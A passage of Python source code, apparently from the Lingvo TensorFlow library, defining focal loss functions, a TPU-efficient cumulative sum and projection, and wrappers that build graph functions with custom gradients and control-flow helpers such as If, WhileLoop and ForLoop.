return loss
if label_probs is not None:
log_probs = tf.nn.log_softmax(logits)
loss = -(label_probs * log_probs)
loss = _ApplyFocalLossCoefficient(loss, log_probs)
if alpha is not None:
loss *= tf.reshape(
alpha, tf.concat([tf.ones(tf.rank(loss) - 1, tf.int32), [-1]],
axis=0))
loss = tf.reduce_sum(loss, axis=-1)
else:
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=label_ids, logits=logits)
loss = _ApplyFocalLossCoefficient(loss, -loss)
if alpha is not None:
loss *= tf.gather(alpha, label_ids)
return loss
def SigmoidCrossEntropyFocalLoss(logits, labels, alpha=None, gamma=None):
u"""Focal loss for binary (sigmoid) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the sigmoid logistic regression.
labels: [..., C]. 0/1 labels.
alpha: The weighting factor alpha. Eq (3) in [1].
gamma: Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
# [1] Eq (4).
#
# The numerically-stable way to compute
# log(p) for positives;
# log(1 - p) for negatives.
loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
if gamma is not None and gamma != 0:
# The modulating factor. Note that
# (1 - p)ˠ = [1 - σ(x)]ˠ = [σ(-x)]ˠ, for positives.
# pˠ = [σ(x)]ˠ, for negatives.
loss *= tf.pow(tf.sigmoid(logits * (1 - labels * 2)), gamma)
if alpha is not None:
# [1] Eq (3)
loss *= (alpha * labels + (1 - alpha) * (1 - labels))
return loss
_RECORD_FORMAT_RE = re.compile('(^[A-Za-z]+):(.*)')
def RecordFormatFromFilePattern(file_pattern):
"""Return the record format string for a Lingvo file pattern.
Lingvo file patterns take the form of:
tfrecord:/path/to/bar -> tfrecord is the record_format.
This function takes a file pattern and returns a string indicating
which format the filepattern implies.
Args:
file_pattern: String file pattern.
Returns:
Tuple (string, string):
- record_format: String record format, e.g., "tfrecord", etc.
- file_pattern: The file pattern without any prefixes.
"""
result = re.match(_RECORD_FORMAT_RE, file_pattern)
if result is None:
# TODO(vrv): Fix all callers so that file_pattern must contain
# the record format prefix.
return 'sstable', file_pattern
# regexp ensures that a match implies there are two groups:
# the record format and then the file pattern.
return result.groups()
def ReadFileLines(file_path):
"""Read a text file and return the lines.
If the file cannot be found at the given path, attempt to load it from the
Lingvo package (useful for data dependencies in par files).
Args:
file_path: path to file, either absolute or relative to the bazel workspace.
Returns:
A list of lines from the file.
"""
if not tf.io.gfile.exists(file_path):
try:
lines = pkgutil.get_data(
'lingvo', file_path.replace('lingvo/', '',
1)).splitlines(True)
except IOError:
# If pkgutil can't find the file, continue and let GFile raise the error.
lines = None
else:
lines = None
if not lines:
with tf.io.gfile.GFile(file_path, 'r') as f:
lines = f.readlines()
return lines
# Partially borrowed from
# https://github.com/tensorflow/tensor2tensor/blob/32929305e1a4ec926eff24123758b794df35492b/tensor2tensor/layers/common_layers.py#L349
def CumSum(x, axis=0, exclusive=False, use_einsum=False):
"""A TPU efficient implementation of tf.cumsum().
This is equivalent to tf.cumsum and is faster on TPU as of 08/2019 unless
the axis dimension is very large. The current Tensorflow implementation is
based on scanning and reducing which is not efficient on TPU.
Args:
x: An input Tensor.
axis: An int for the axis.
exclusive: A bool for performing exclusive cumsum.
use_einsum: If true, use einsum on TPU.
Returns:
A Tensor of the same shape as x.
Raises:
ValueError: if the input axis is invalid.
"""
if x.dtype not in (tf.float32, tf.bfloat16) or not use_tpu():
# Fallback to tf.cumsum when inputs are not floats or not running on TPU.
return tf.cumsum(x, axis=axis, exclusive=exclusive)
rank = GetRank(x)
# Needs to know the rank for the final transpose if axis is not the last
# dimension. Otherwise, falls back to tf.cumsum.
if not isinstance(rank, int) and axis != -1:
return tf.cumsum(x, axis=axis, exclusive=exclusive)
if axis < -1:
if axis + rank < 0:
raise ValueError('Unexpected axis: %d (rank = %d)' % (axis, rank))
axis += rank
if use_einsum:
assert isinstance(rank, int) and rank < 26, rank
# Use einsum to avoid data formatting overhead.
a2z = ''.join([chr(i) for i in range(97, 123)]) # abc...xyz
src = a2z[:rank]
if axis == -1:
tgt = src[:-1] + 'z'
else:
tgt = src[:axis] + 'z' + src[axis + 1:]
length = GetShape(x)[axis]
causal_mask = tf.linalg.band_part(
tf.ones([length, length], dtype=x.dtype), 0, -1)
return tf.einsum(f'{src},{src[axis]}z->{tgt}', x, causal_mask)
length = GetShape(x)[axis]
my_range = tf.range(length)
comparator = tf.less if exclusive else tf.less_equal
mask = tf.cast(
comparator(tf.expand_dims(my_range, 1), tf.expand_dims(my_range, 0)),
x.dtype)
result = tf.tensordot(x, mask, axes=[[axis], [0]])
if axis != -1 and axis != rank - 1:
result = tf.transpose(
result,
list(range(axis)) + [rank - 1] + list(range(axis, rank - 1)))
return result
def ProjectLastDim(inputs, weight, input_dim, output_dim):
"""Linear projection on the last dim of the input tensor.
This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
tensor by using Einsum for the compute.
Args:
inputs: An input Tensor, the last dimension of which is input_dim.
weight: A weight matrix with shape [input_dim, output_dim].
input_dim: An integer or a symbolic dim, the last dimension of the inputs.
output_dim: An integer or a symbolic dim, the last dimension of the outputs.
Returns:
An output Tensor of the same rank as inputs, the last dimension is
output_dim.
"""
input_dim = int(
symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
output_dim = int(
symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
) else output_dim)
# Assert input_dim and output_dim
inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
inputs)
weight = with_dependencies([
assert_equal(GetShape(weight)[0], input_dim),
assert_equal(GetShape(weight)[-1], output_dim)
], weight)
if (use_tpu() and inputs.shape is not None and
inputs.shape.rank is not None and inputs.shape.rank < 26):
# Avoids reshape if feasible and uses Einsum.
if inputs.shape.rank == 2:
outputs = tf.matmul(inputs, weight)
else:
# This is equivalent to:
# outputs = tf.einsum('...y,yz->...z', inputs, weight)
# Unfortunately ... in einsum() leads to extra HBM usage.
s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
r = inputs.shape.rank
outputs = tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), inputs, weight)
else:
outputs = Matmul(tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight)
outputs = tf.reshape(
outputs,
tf.concat([
tf.cast(GetShape(inputs)[:-1], tf.int32),
ToStaticShape([output_dim])
],
axis=0))
return outputs
@contextlib.contextmanager
def RemoveAssertContext(remove=True):
"""Hacks to replace certain unwanted tensorflow ops."""
# TODO(zhifengc/huangyp): Consider implementing assert_equal
# op replacement for lingvo. As assert_equal doesn't support String on GPUs.
# Hack to replace tf.assert_equal
# TODO(b/136040013): Remove this after migration to tf.function.
if remove:
saved_assert_equal = tf.check_ops.assert_equal
def NoOP(*args, **kwargs): # pylint: disable=unused-argument
return tf.no_op()
tf.check_ops.assert_equal = NoOP # Make assert_equal a no op.
try:
yield
finally:
tf.check_ops.assert_equal = saved_assert_equal
else:
yield
def _AssertInputsMatch(op, args, implicit_captures):
"""Assert that op's inputs match with args and implicit_captures.
Args:
op: The operation to check.
args: A nested structure representing the explicit arguments of 'op'.
implicit_captures: A nested structure representing the implicitly captured
inputs of 'op'.
Raises:
ValueError: if the number of inputs mismatch.
"""
expected_inputs = Flatten([args, implicit_captures])
expected_num_inputs = len(expected_inputs)
if len(op.inputs) > expected_num_inputs:
raise ValueError(('Too many inputs. The most likely cause is that fwd '
'captures additional tensors: extra inputs %r vs %r '
'captures=%r') % (list(op.inputs), list(expected_inputs),
list(Flatten(implicit_captures))))
if len(op.inputs) < expected_num_inputs:
raise ValueError(('Mismatched inputs to fwd: Found %d vs expected %d: %r'
'. Implicit captures(%d) = %r') %
(len(op.inputs), expected_num_inputs, list(op.inputs),
len(Flatten(implicit_captures)), implicit_captures))
def TensorSpecs(nmap, keep_shape=True):
"""Transforms tensors in the input nested structure to TensorSpecs."""
if nmap is None:
return None
fn = lambda t: tf.TensorSpec(t.shape if keep_shape else None, t.dtype)
return Transform(fn, nmap)
def _DefineDefun(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that fwd takes no inputs).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: the device on which to run `fwd` and `bak`.
Returns:
A NestedMap containing:
- call: A callable that will execute `fwd`. It has the same input and output
signatures as `fwd`.
- func: The underlying TF function that `call` calls. If not None, it will
be a _DefinedFunction or ConcreteFunction that takes flat inputs and
returns flat outputs, and can be used by routines that require a TF
function object (e.g. tf.If, tf.While, etc).
Always not None when `bak` is None.
- output_dtypes: A nested structure compatible with the outputs of `fwd`
containing the corresponding output dtypes.
- stateful_ops: A list of (op_name, op_type) tuples representing the
stateful ops used by `fwd`.
- captured_inputs: Implicit inputs captured by `fwd`.
"""
assert fwd is not None
noinline = not use_xla()
if fwd_sig is None:
fwd_sig = []
get_dtype = lambda x: x.dtype
arg_dtypes = Flatten(Transform(get_dtype, fwd_sig))
get_shape = lambda x: x.shape
arg_shapes = Flatten(Transform(get_shape, fwd_sig))
# Used to hold the backward function used by Grad, which will be defined if
# bak is set.
sigs = NestedMap()
# Output of this method.
res = NestedMap()
python_grad_func = None
if bak:
def Grad(op, *args):
"""Gradient function for the forward function.
Args:
op: The forward operation.
*args: Gradients wrt op.outputs.
Returns:
Tuple of derivatives.
"""
_AssertInputsMatch(op, fwd_sig, res.captured_inputs)
# Ensure dys contains no None.
args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
xs = op.inputs[:len(arg_dtypes)] # The rest are captures.
return sigs.backward(*Flatten([xs, op.outputs, args]))
python_grad_func = Grad
def _SetShape(dst_list, shape_list):
for dst, shape in zip(dst_list, shape_list):
if isinstance(dst, tf.Tensor):
dst.set_shape(shape)
@tf.Defun(*arg_dtypes, python_grad_func=python_grad_func, noinline=noinline)
def Forward(*args):
"""The forward function."""
_SetShape(args, arg_shapes)
with RemoveAssertContext(remove=noinline):
call = lambda: fwd(Pack(fwd_sig, args)) if args else fwd()
if device is None:
# Defun will handle the device assignment.
rets = call()
else:
with tf.device(device):
rets = call()
res.outputs = rets
return Flatten(rets)
forward = Forward
if not arg_dtypes:
# In this case Forward is an _OverloadedFunction, we need to instantiate it.
forward = Forward.instantiate([])
# Invokes fwd() to get res.outputs.
forward.add_to_graph(tf.get_default_graph())
res.func = forward
res.stateful_ops = forward.stateful_ops
res.captured_inputs = forward.captured_inputs
output_dtypes = Transform(get_dtype, res.outputs)
output_shapes = Transform(get_shape, res.outputs)
def Call(args=None):
"""Wrapper of fwd."""
if args is None:
flat_rets = forward()
else:
flat_rets = forward(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
_SetShape(flat_rets, Flatten(output_shapes))
return Pack(output_dtypes, flat_rets)
res.call = Call
if bak:
def Backward(*args):
"""The backward function."""
_SetShape(args, Flatten([arg_shapes, output_shapes, output_shapes]))
xs, ys, dys = Pack([fwd_sig, output_dtypes, output_dtypes], args)
with RemoveAssertContext(remove=noinline):
if device is None:
# Defun will handle the device assignment.
dxs = bak(xs, ys, dys)
else:
with tf.device(device):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
if bak_as_function:
sigs.backward = tf.Defun(
*Flatten([arg_dtypes, output_dtypes, output_dtypes]),
noinline=noinline)(
Backward)
sigs.backward.add_to_graph(tf.get_default_graph())
else:
sigs.backward = Backward
return res
# Global variable to control rendezvous sharing in tf.function.
# If False (default) rendezvous sharing is disabled in tf.function, that is, the
# function body use a separate rendezvous and can't communicate with parent
# graph via send/recv.
# With _GetSharedRendezvous() == True, the function body share the same
# rendezvous with the parent graph and can talk to it using send/recv. This is
# useful for layers like StackedRecurrent.
_SHARED_RENDEZVOUS = ThreadLocalStack()
@contextlib.contextmanager
def _SharedRendezvousScope(shared_rendezvous=True):
_SHARED_RENDEZVOUS.stack.append(shared_rendezvous)
try:
yield
finally:
_SHARED_RENDEZVOUS.stack.pop()
def _GetSharedRendezvous():
"""Get the current rendezvous sharing setting."""
return _SHARED_RENDEZVOUS.stack[-1] if _SHARED_RENDEZVOUS.stack else False
def _ApplySharedRendezvous(func):
"""Apply the rendezvous sharing setting on the given tf.function func."""
# pylint: disable=protected-access
func._shared_rendezvous = _GetSharedRendezvous()
# pylint: enable=protected-access
def _WrapFunction(func=None, input_signature=None):
"""Wraps func as a tf.function."""
if input_signature is None:
input_signature = []
def Decorated(fn):
@tf.function(input_signature=input_signature, autograph=False)
def Fn(*args):
# TODO(b/163904067): mimic Defun' behavior and reset the step seed to
# avoid it being used as an implicit capture. This is not a desired
# behavior, it should take the step seed from parent graph instead.
ResetStepSeed()
# Mimic Defun and disable collection sharing.
graph = tf.get_default_graph()
# Don't share summaries collection with parent graph (b/168745134).
graph.clear_collection(tf.GraphKeys.SUMMARIES)
return fn(*args)
_ApplySharedRendezvous(Fn)
# Add the function to the graph so it'll be traced under the current
# context. This is necessary if the function body captures any non-tensor
# values from the environment, like symbolic maps.
cf = Fn.get_concrete_function()
cf.add_to_graph()
return cf
# For the `foo = _WrapFunction(foo, ...)` use case.
if func is not None:
return Decorated(func)
# For the `@_WrapFunction(...)` use case.
return Decorated
def _DefineFunction(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that fwd takes no inputs).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: the device on which to run `fwd` and `bak`.
Returns:
A NestedMap containing:
- call: A callable that will execute `fwd`. It has the same input and output
signatures as `fwd`.
- func: The underlying TF function that `call` calls. If not None, it will
be a _DefinedFunction or ConcreteFunction that takes flat inputs and
returns flat outputs, and can be used by routines that require a TF
function object (e.g. tf.If, tf.While, etc).
Always not None when `bak` is None.
- outputs: The outputs of `fwd`. Used for reflection only (e.g. to get the
output dtypes, shapes, etc).
- stateful_ops: A list of (op_name, op_type) tuples representing the
stateful ops used by `fwd`.
- captured_inputs: Implicit inputs captured by `fwd`.
"""
assert fwd is not None
noinline = not use_xla()
if fwd_sig is None:
fwd_sig = []
if device is None:
# Get the current device to mimic Defun's behavior.
# pylint: disable=protected-access
device_funcs = tf.get_default_graph()._device_functions_outer_to_inner
device = device_funcs[-1] if device_funcs else None
# pylint: enable=protected-access
# Output of this method.
res = NestedMap()
@_WrapFunction(input_signature=Flatten(fwd_sig))
def Forward(*args):
"""The forward function."""
with RemoveAssertContext(remove=noinline), tf.device(device):
if args:
xs = Pack(fwd_sig, args)
rets = fwd(xs)
else:
rets = fwd()
res.outputs = rets
return Flatten(rets)
res.captured_inputs = Forward.captured_inputs
# Get the stateful ops used in cell_fn. Logic borrowed from
# _EagerDefinedFunction.__init__().
graph = Forward.graph
input_ops = set(arg.op for arg in graph.inputs)
operations = [op for op in graph.get_operations() if op not in input_ops]
res.stateful_ops = [(o.name, o.type) for o in operations if o._is_stateful] # pylint: disable=protected-access
def Call(func, args=None):
"""Wrapper of fwd."""
if args is None:
flat_rets = func()
else:
flat_rets = func(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
return Pack(res.outputs, flat_rets)
if not bak:
res.func = Forward
res.call = lambda args=None: Call(Forward, args)
return res
shared_rendezvous = _GetSharedRendezvous()
ret_specs = TensorSpecs(res.outputs)
def Backward(*args):
xs, ys, dys = Pack([fwd_sig, ret_specs, ret_specs], args)
with RemoveAssertContext(remove=noinline), tf.device(device):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
if bak_as_function:
backward_cf = _WrapFunction(
Backward, input_signature=Flatten([fwd_sig, ret_specs, ret_specs]))
else:
def BackwardWithSharedRendezvous(*args):
with _SharedRendezvousScope(shared_rendezvous):
return Backward(*args)
backward_cf = BackwardWithSharedRendezvous
@tf.custom_gradient
def ForwardWithGrad(*args):
"""Forward function and its custom gradient."""
# Note that `args` includes implicit captures. This is required by
# tf.custom_gradient so that when the Grad() outputs include gradients to
# implicit captures, they match the inputs to ForwardWithGrad().
#
# However, Forward doesn't take implicit captures as input, so we exclude
# them here.
fwd_args = args[:(len(args) - len(Flatten(res.captured_inputs)))]
op = NestedMap(inputs=args, outputs=Forward(*fwd_args))
def Grad(*args, **kwargs):
"""Gradient function for the forward function.
Args:
*args: Gradients wrt op.outputs.
**kwargs: Additional arguments from tf.custom_gradient.
Returns:
Tuple of derivatives.
"""
if kwargs:
tf.logging.warning(
'Ignoring additional arguments used by tf.custom_gradient: %s',
str(kwargs))
_AssertInputsMatch(op, fwd_sig, res.captured_inputs)
# Ensure dys contains no None.
args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
xs, _ = Pack([fwd_sig, res.captured_inputs], op.inputs)
return backward_cf(*Flatten([xs, op.outputs, args]))
return op.outputs, Grad
res.func = None
forward = lambda *xs: ForwardWithGrad(*Flatten([xs, res.captured_inputs]))
res.call = lambda args=None: Call(forward, args)
return res
# Global variable to control whether to use tf.function.
# If not set, the result is determined by tf2 status. See _UseTfFunction for
# details.
# TODO(laigd): remove after b/169869929 is fixed.
_USE_TF_FUNCTION = ThreadLocalStack()
# Constants for propagating framework tensors through Function.
_FRAMEWORK_TENSOR_GLOBAL_STEP = '_global_step'
@contextlib.contextmanager
def TfFunctionScope(use_tf_function=True):
_USE_TF_FUNCTION.stack.append(use_tf_function)
try:
yield
finally:
_USE_TF_FUNCTION.stack.pop()
def _UseTfFunction():
"""Whether to use tf.function instead of tf.Defun."""
if _USE_TF_FUNCTION.stack:
return _USE_TF_FUNCTION.stack[-1]
return tf2_enabled()
class Function(object):
"""Function builds a TensorFlow graph function from a callable.
In the high level this is similar to tf.Defun and tf.function. In fact this
relies on those as underlying implementations, but with specific configuration
so it's easier to use and can work well in some extreme cases in Lingvo.
Example usage:
- No inputs:
>>> @Function()
... def foo():
... return tf.constant(1.0)
>>> y = foo()
- Scalar input:
>>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32))
... def foo(x):
... return x * 2
>>> y = foo(1.0)
- List input:
>>> @Function(fwd_sig=[tf.TensorSpec(None, tf.float32) for _ in range(2)])
... def foo(xs):
... return xs[0] + xs[1]
>>> y = foo([1.0, 2.0])
- Nested input:
>>> @Function(fwd_sig=NestedMap(x=tf.TensorSpec(None, tf.float32)))
... def foo(nmap):
... return nmap.x * 2
>>> y = foo(NestedMap(x=1.0))
- With custom gradient function (other input types mentioned above are also
supported):
>>> def bar(x, y, dy):
... del y, dy
... return 4.0 * x * dy
>>>
>>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32), bak=bar)
... def foo(x):
... return 2.0 * x * x
- Used in control flow ops:
>>> then_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: x / 2)
>>> else_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: 3 * x + 1)
>>> y = tf.If(cond, inputs, then_branch.func, else_branch.func)
"""
# TODO(laigd): the use_tf_function option is added for backward compatibility
# reasons. Remove it after the migration.
def __init__(self,
fwd_sig=None,
bak=None,
bak_as_function=False,
device=None,
use_tf_function=None):
"""Constructor.
Below we assume `fwd` is the input to `__call__` that is used to build the
TensorFlow graph function encapsulated by this object.
Args:
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
actual inputs should be compatible with this (have same shapes and
dtypes).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if `fwd` uses any implicitly captured tensors, whose gradients
are dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: The device on which to run `fwd` and `bak`. Defaults to the
current device.
use_tf_function: Whether use tf.function. Defaults to _UseTfFunction().
"""
self._fwd_sig = fwd_sig
self._bak = bak
self._bak_as_function = bak_as_function
self._device = device
self._use_tf_function = use_tf_function
def __call__(self, fwd):
"""Creates a graph function.
Args:
fwd: a callable xs: Nested Structure -> ys: Nested Structure.
Returns:
A DefinedFunction object encapsulating `fwd` as a graph function.
"""
assert callable(fwd)
return DefinedFunction(fwd, self._fwd_sig, self._bak, self._bak_as_function,
self._device, self._use_tf_function)
class DefinedFunction(object):
"""Encapsulates a TensorFlow graph function and its properties."""
def __init__(self,
fwd,
fwd_sig=None,
bak=None,
bak_as_function=False,
device=None,
use_tf_function=None):
"""Constructor.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure. Used to
build the TensorFlow graph function that this object encapsulates.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
actual inputs should be compatible with this (have same shapes and
dtypes).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if `fwd` uses any implicitly captured tensors, whose gradients
are dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: The device on which to run `fwd` and `bak`. Defaults to the
current device.
use_tf_function: Whether use tf.function. Defaults to _UseTfFunction().
"""
self._fwd_sig = fwd_sig
wrapped_fwd_sig = fwd_sig
fwd_fn = fwd
bak_fn = bak
graph_random_seed = None
if tf.get_default_graph().seed is not None:
graph_random_seed = tf.get_default_graph().seed
# Wrap the forward function to propagate framework tensors like step_seed
# and global_step.
wrapped_fwd_sig = NestedMap()
self._added_global_step = False
if GetGlobalStep() is not None:
wrapped_fwd_sig[_FRAMEWORK_TENSOR_GLOBAL_STEP] = (
tf.TensorSpec([], tf.int64))
self._added_global_step = True
if fwd_sig is not None:
wrapped_fwd_sig.inputs = fwd_sig
elif not wrapped_fwd_sig:
wrapped_fwd_sig = None
def ForwardWrapped(wrapped_inputs=None):
if graph_random_seed is not None:
tf.random.set_seed(graph_random_seed)
global_step = None
if wrapped_inputs:
assert isinstance(wrapped_inputs, NestedMap)
global_step = wrapped_inputs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)
with GlobalStepContext(global_step):
if wrapped_inputs and 'inputs' in wrapped_inputs:
result = fwd(wrapped_inputs.inputs)
else:
result = fwd()
return result
fwd_fn = ForwardWrapped
if bak:
# Wrap the backward function to return zero gradients for framework
# tensors like step_seed and global_step.
def BackwardWrapped(wrapped_xs, ys, dys):
if graph_random_seed is not None:
tf.random.set_seed(graph_random_seed)
with GlobalStepContext(
wrapped_xs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)):
result = bak(wrapped_xs.inputs, ys, dys)
dxs = Transform(tf.zeros_like, wrapped_xs)
if isinstance(result, tuple) and len(result) == 2:
dxs.inputs, dcapture = result
return dxs, dcapture
else:
dxs.inputs = result
return dxs
bak_fn = BackwardWrapped
if use_tf_function is None:
use_tf_function = _UseTfFunction()
fn = _DefineFunction if use_tf_function else _DefineDefun
self._data = fn(
fwd=fwd_fn,
fwd_sig=wrapped_fwd_sig,
bak=bak_fn,
bak_as_function=bak_as_function,
device=device)
def __call__(self, args=None):
"""Invokes the graph function.
Args:
args: the inputs to the graph function, must be compatible with `fwd_sig`.
Returns:
The output tensors with the same structure as the output of `fwd`,
returned by a call to the graph function.
"""
assert IsCompatible(args,
self._fwd_sig), '{} vs {}'.format(args, self._fwd_sig)
return self._data.call(self.AddFrameworkInputs(args))
@property
def func(self):
"""The underlying TensorFlow graph function that this object encapsulates.
The returned graph function is created by tracing `fwd` during construction.
If not None, it will be a _DefinedFunction or ConcreteFunction that takes
flat inputs and returns flat outputs, and can be used by routines that
require a TensorFlow function object (e.g. tf.If, tf.While, etc).
If no backprop function is provided during construction, the result is
always not None.
"""
return self._data.func
def AddFrameworkInputs(self, inputs):
"""Add framework tensors like step_seed and global_step to inputs.
This is only necessary when using `func`, as wrapping is handled
automatically in __call__.
Args:
inputs: inputs to the function.
Returns:
Inputs wrapped with framework tensors suitable for use with `func`.
"""
result = NestedMap()
if self._added_global_step:
global_step = GetGlobalStep()
assert global_step is not None
result[_FRAMEWORK_TENSOR_GLOBAL_STEP] = tf.cast(global_step, tf.int64)
if inputs is not None:
result.inputs = inputs
return result if result else None
@property
def output_dtypes(self):
"""Output dtypes of the graph function.
The result will have the same structure as the outputs of `fwd` but contain
the corresponding output dtypes.
"""
return Transform(lambda x: x.dtype, self._data.outputs)
@property
def stateful_ops(self):
"""Stateful ops used by `fwd`, as a list of (op_name, op_type) tuples."""
return self._data.stateful_ops
@property
def captured_inputs(self):
"""Implicit input tensors captured by `fwd`."""
return self._data.captured_inputs
def CallDefun(fwd, args=None, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak and calls it with args.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
args: A Nested Structure of tf.Tensor or None.
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for fwd. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for bak.
device: the device on which to run fwd and bak.
Returns:
A Nested Structure equivalent to what fwd(args) computes.
"""
if args is not None:
args = Transform(tf.convert_to_tensor, args)
sigs = Function(
fwd_sig=TensorSpecs(args),
bak=bak,
bak_as_function=bak_as_function,
device=device)(
fwd=fwd)
if args is None:
return sigs()
else:
return sigs(args)
def If(cond, inputs, then_branch, else_branch):
"""Helper to construct an if/else statement.
Args:
cond: A scalar `Tensor` that can be converted to boolean.
inputs: A flattenable representing the input tensors of the if/else
statement. Can be None to represent no inputs.
then_branch: A callable 'inputs' -> flattenable. The returned value should
be compatible with what 'else_branch' returns.
else_branch: A callable 'inputs' -> flattenable. The returned value should
be compatible with what 'then_branch' returns.
Returns:
Output returned by the call to either 'then_branch' or 'else_branch'.
"""
fwd_sig = TensorSpecs(inputs)
then_sigs = Function(fwd_sig=fwd_sig)(fwd=then_branch)
else_sigs = Function(fwd_sig=fwd_sig)(fwd=else_branch)
assert IsCompatible(then_sigs.output_dtypes, else_sigs.output_dtypes), (
'Outputs of then_branch and else_branch are not compatible: {} vs {}'
.format(then_sigs.output_dtypes, else_sigs.output_dtypes))
if then_sigs.captured_inputs != else_sigs.captured_inputs:
raise ValueError('Differing captured inputs in then and else. '
'Ensure the same tensors are captured in the same order.')
ret = tf.If(
cond=cond,
inputs=Flatten(then_sigs.AddFrameworkInputs(inputs)) +
then_sigs.captured_inputs,
then_branch=then_sigs.func,
else_branch=else_sigs.func)
return Pack(then_sigs.output_dtypes, ret)
def _Itype():
"""Loop iterator data type."""
return tf.int32 if use_xla() else tf.int64
def WhileLoop(cond, body, loop_state):
"""Helper to construct a while loop.
Args:
cond: A callable NestedMap -> tf.bool.
body: A callable NestedMap -> NestedMap.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
fwd_sig = TensorSpecs(loop_state)
cond_sigs = Function(fwd_sig=fwd_sig)(fwd=cond)
def BodyWrapped(loop_state):
result = body(loop_state)
# loop_state is augmented with global tensors inside of DefinedFunction.
# WhileLoop needs to return the same structure as the inputs, so we augment
# the return value here to match.
result = cond_sigs.AddFrameworkInputs(result)
return result
body_sigs = Function(fwd_sig=fwd_sig)(fwd=BodyWrapped)
wrapped_inputs = body_sigs.AddFrameworkInputs(loop_state)
new_state = tf.While(
Flatten(wrapped_inputs), cond=cond_sigs.func, body=body_sigs.func)
return Pack(wrapped_inputs, new_state).inputs
def ForLoop(body, start, limit, delta, loop_state):
"""Helper to construct a for loop.
Args:
body: A callable (tf.int, NestedMap) -> NestedMap.
start: Loop variable's initial value.
limit: Loop variable's limit value.
delta: Loop variable's change per iteration.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(
iter=tf.cast(start, _Itype()),
limit=tf.cast(limit, _Itype()),
delta=tf.cast(delta, _Itype()),
loop_state=loop_state)
def LoopCond(state):
return tf.less(state.iter, state.limit)
def LoopBody(state):
state.loop_state = body(state.iter, state.loop_state)
state.iter = tf.add(state.iter, state.delta)
return state
return WhileLoop(LoopCond, LoopBody, state).loop_state
def TopK(x_in, k):
"""Equivalent to tf.math.top_k(x_in, k) but more efficient on tpu."""
assert k <= 2, 'This implementation is only efficient for small k.'
# TODO(yonghui): Try out an alternative idea where we first reshape x_in as a
# 2d tensor, then call tf.math.top_k, and then reshape back.
x_in_shape = x_in.shape
x_rank = x_in_shape.rank
assert x_rank and x_in_shape.as_list()[x_rank - 1] > 0
last_dim_size = x_in_shape.as_list()[x_rank - 1]
min_value = tf.math.reduce_min(x_in) - 1.0
out_indices = []
out_values = []
for unused_i in range(k):
index_i = tf.math.argmax(x_in, axis=-1, output_type=tf.int32)
mask_i = tf.one_hot(index_i, last_dim_size)
# TODO(yonghui): Would tf.gather be more efficient and numerically stable
# here?
value_i = tf.reduce_sum(mask_i * x_in, -1, keepdims=True)
x_in = (1.0 - mask_i) * x_in + mask_i * min_value
out_indices.append(tf.expand_dims(index_i, -1))
out_values.append(value_i)
if k == 1:
return out_values[0], out_indices[0]
else:
return tf.concat(out_values, x_rank - 1), tf.concat(out_indices, x_rank - 1)
